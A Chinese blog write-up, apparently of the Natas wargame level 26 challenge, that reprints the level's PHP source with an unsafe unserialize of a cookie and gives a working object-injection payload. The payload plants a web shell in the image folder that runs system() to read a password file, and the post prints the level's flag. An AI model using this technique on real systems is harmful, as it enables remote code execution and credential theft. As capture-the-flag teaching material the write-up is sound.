##源码:

<?php

    // sry, this is ugly as hell.

    // cheers kaliman ;)

    // - morla

    class Logger{

        private $logFile;

        private $initMsg;

        private $exitMsg;

        function __construct($file){

            // initialise variables

            $this->initMsg="#--session started--#\n";

            $this->exitMsg="#--session end--#\n";

            $this->logFile = "/tmp/natas26_" . $file . ".log";

            // write initial message

            $fd=fopen($this->logFile,"a+");

            fwrite($fd,$initMsg);

            fclose($fd);

        }                       

        function log($msg){

            $fd=fopen($this->logFile,"a+");

            fwrite($fd,$msg."\n");

            fclose($fd);

        }                       

        function __destruct(){

            // write exit message

            $fd=fopen($this->logFile,"a+");

            fwrite($fd,$this->exitMsg);

            fclose($fd);

        }

    }

    function showImage($filename){

        if(file_exists($filename))

            echo "<img src=\"$filename\">";

    }

    function drawImage($filename){

        $img=imagecreatetruecolor(400,300);

        drawFromUserdata($img);

        imagepng($img,$filename);

        imagedestroy($img);

    }

    function drawFromUserdata($img){

        if( array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&

            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET)){

            $color=imagecolorallocate($img,0xff,0x12,0x1c);

            imageline($img,$_GET["x1"], $_GET["y1"],

                            $_GET["x2"], $_GET["y2"], $color);

        }

        if (array_key_exists("drawing", $_COOKIE)){

            $drawing=unserialize(base64_decode($_COOKIE["drawing"]));

            if($drawing)

                foreach($drawing as $object)

                    if( array_key_exists("x1", $object) &&

                        array_key_exists("y1", $object) &&

                        array_key_exists("x2", $object) &&

                        array_key_exists("y2", $object)){

                        $color=imagecolorallocate($img,0xff,0x12,0x1c);

                        imageline($img,$object["x1"],$object["y1"],

                                $object["x2"] ,$object["y2"] ,$color);

                    }

        }

    }

    function storeData(){

        $new_object=array();

        if(array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&

            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET)){

            $new_object["x1"]=$_GET["x1"];

            $new_object["y1"]=$_GET["y1"];

            $new_object["x2"]=$_GET["x2"];

            $new_object["y2"]=$_GET["y2"];

        }

        if (array_key_exists("drawing", $_COOKIE)){

            $drawing=unserialize(base64_decode($_COOKIE["drawing"]));

        }

        else{

            // create new array

            $drawing=array();

        }

        $drawing[]=$new_object;

        setcookie("drawing",base64_encode(serialize($drawing)));

    }

?>

<h1>natas26</h1>

<div id="content">

Draw a line:<br>

<form name="input" method="get">

X1<input type="text" name="x1" size=2>

Y1<input type="text" name="y1" size=2>

X2<input type="text" name="x2" size=2>

Y2<input type="text" name="y2" size=2>

<input type="submit" value="DRAW!">

</form> 

<?php

    session_start();

    if (array_key_exists("drawing", $_COOKIE) ||

        (   array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&

            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET))){

        $imgfile="img/natas26_" . session_id() .".png";

        drawImage($imgfile);

        showImage($imgfile);

        storeData();

    }

?>

主要知识点参见PHP Object Injection(PHP对象注入)

思路上的问题:

了解PHP对象注入后,不知道该如何回显,以为这里没有eval和system等能够执行命令的语句(序列化又只能传入键值对(字符串而非执行语句))。其实很简单,这里不需要服务器端在解析的时候回显flag,我们只需要在能够访问的文件夹(imag\)下建立一个shell(fuck.php)(路径可以用字符串表示传入),写入php语句,然后访问该脚本,就能够进行任意语句执行/回显!

生成序列化的注入实体时犯的错误:

<?php

    class Logger{

        function __construct($file){

            $this->initMsg="<? \n\nsystem('cat /etc/natas_webpass/natas27'); ?>\n\n";

            $this->logFile = "img/fuck3.php";

	    $this->exitMsg ="<? \n\nsystem('cat /etc/natas_webpass/natas27'); ?>\n\n";

        }

    }

print urlencode(base64_encode(serialize(new Logger('asd'))));

?>

源码中声明Logger时进行了访问控制(三个属性全部私有),如果不加private的话是默认公有的,生成的序列化字节串会不匹配,要注意这一点,数据类型一定要匹配。(另外,序列话字节串只能保存键值对,无法保存对象中的方法定义)。

正确做法:

<?php

    class Logger{

	private $logFile;

        private $initMsg;

        private $exitMsg;

        function __construct($file){

            $this->initMsg="<? \n\nsystem('cat /etc/natas_webpass/natas27'); ?>\n\n";

            $this->logFile = "img/fuck3.php";

	    $this->exitMsg ="<? \n\nsystem('cat /etc/natas_webpass/natas27'); ?>\n\n";

        }

    }

print urlencode(base64_encode(serialize(new Logger('asd'))));

?>

ps:其实还有个小问题,当前路径就写“img/....”即可,当时脑袋抽写成了"/imag/...."

然后访问img/fuck.php这个shell即可得到flag。

flag:**55TBjpPZUUJgVP5b3BnbG6ON9uDPVzCJ **

Natas Wargame Level26 Writeup(PHP对象注入)的更多相关文章

  1. Natas Wargame Level20 Writeup(会话状态注入/篡改)

    aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAArMAAACmCAYAAADJYwcaAAAABHNCSVQICAgIfAhkiAAAIABJREFUeF

  2. Natas Wargame Level27 Writeup(SQL表的注入/溢出与截取)

    前端: <html> <head> <!-- This stuff in the header has nothing to do with the level --&g ...

  3. Natas Wargame Level25 Writeup(头部注入+POST/GET注入)

    aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAArsAAAC8CAYAAAB4+WYTAAAABHNCSVQICAgIfAhkiAAAIABJREFUeF

  4. 转:Natas Wargame Level28 Writeup(EBC加密破解)

    From:http://alkalinesecurity.com/blog/ctf-writeups/natas-28-getting-it-wrong/ Now that I knew it was ...

  5. joomla \libraries\joomla\session\session.php 反序列化截断畸形字符串导致对象注入漏洞

    catalog . 漏洞描述 . PHP SESSION持久化 . PHP 序列化/反序列化内核实现 . 漏洞代码分析 . POC构造技巧 . 防御方案 . Code Pathc方案 1. 漏洞描述 ...

  6. struts2将servlet对象注入到Action中

    在struts2框架中,可以通过IoC方式将servlet对象注入到Action中,通常需要Action实现以下接口: a. ServletRequestAware: 实现该接口的Action可以直接 ...

  7. Codeigniter 利用加密Key(密钥)的对象注入漏洞

    http://drops.wooyun.org/papers/1449 原文链接:http://www.mehmetince.net/codeigniter-object-injection-vuln ...

  8. 深入理解PHP对象注入

    0x00 背景 php对象注入是一个非常常见的漏洞,这个类型的漏洞虽然有些难以利用,但仍旧非常危险,为了理解这个漏洞,请读者具备基础的php知识. 0x01 漏洞案例 如果你觉得这是个渣渣洞,那么请看 ...

  9. PHP对象注入 PHP Object Injection

    From:PHP Object Injection Last revision (mm/dd/yy): 01/7/2015 译者:李秋豪 Wednesday, 24. May 2017 05:48PM ...

随机推荐

  1. 使用Supervisor守护Python进程

    1.需求 现在有一个进程需要每时每刻不断的跑,但是这个进程又有可能由于各种原因有可能中断.当进程中断的时候我希望能自动重新启动它,此时,就需要使用到了Supervisor.Supervisor起到守护 ...

  2. 深入理解js中的apply、call、bind

    概述 js中的apply,call都是为了改变某个函数运行时的上下文环境而存在的,即改变函数内部的this指向. apply() apply 方法传入两个参数:一个是作为函数上下文的对象,另外一个是作 ...

  3. Java URL类踩坑指南

    背景介绍 最近再做一个RSS阅读工具给自己用,其中一个环节是从服务器端获取一个包含了RSS源列表的json文件,再根据这个json文件下载.解析RSS内容.核心代码如下: class Presente ...

  4. android studio 默认 .gitignore 文件模板

    # built application files*.apk*.ap_ # files for the dex VM*.dex # Java class files*.class # generate ...

  5. 内存泄漏监测-LeakCanary

    内存泄漏监测方法之使用LeakCanary LeakCanary出处: github:https://github.com/square/leakcanary/issues square 公司 这个公 ...

  6. RedHat升级Python到2.7.6

    今天本来想研究一下Python  paramiko模块,安装安装 paramiko-1.10.1.tar.gz的时候报错,!看了一下虚拟机RedHat中的python,发现还是原生的2.4.3,所以决 ...

  7. Linux 链接详解(1)

    可执行文件的生成过程: hello.c ----预处理--->  hello.i ----编译----> hello.s -----汇编-----> hello.o -----链接- ...

  8. javascript设计模式——享元模式

    前面的话 享元(flyweight)模式是一种用于性能优化的模式,“fly”在这里是苍蝇的意思,意为蝇量级.享元模式的核心是运用共享技术来有效支持大量细粒度的对象.如果系统中因为创建了大量类似的对象而 ...

  9. springboot+thymeleaf(2)

    操作步骤 (1)在pom.xml中引入thymeleaf; (2)如何关闭thymeleaf缓存 (3)编写模板文件.html (4)编写访问模板文件controller 1.在pom.xml中引入t ...

  10. 逐步搭建Lamp环境之vim的三种模式以及基本命令

    在Linux中vim的三种模式分别为:命令模式.末行模式.编辑模式.以下是三者的关系图: 三种模式的彼此切换: 命令模式是vim中的默认模式. 命令模式切换至末行模式: 使用英文冒号(:). 末行模式 ...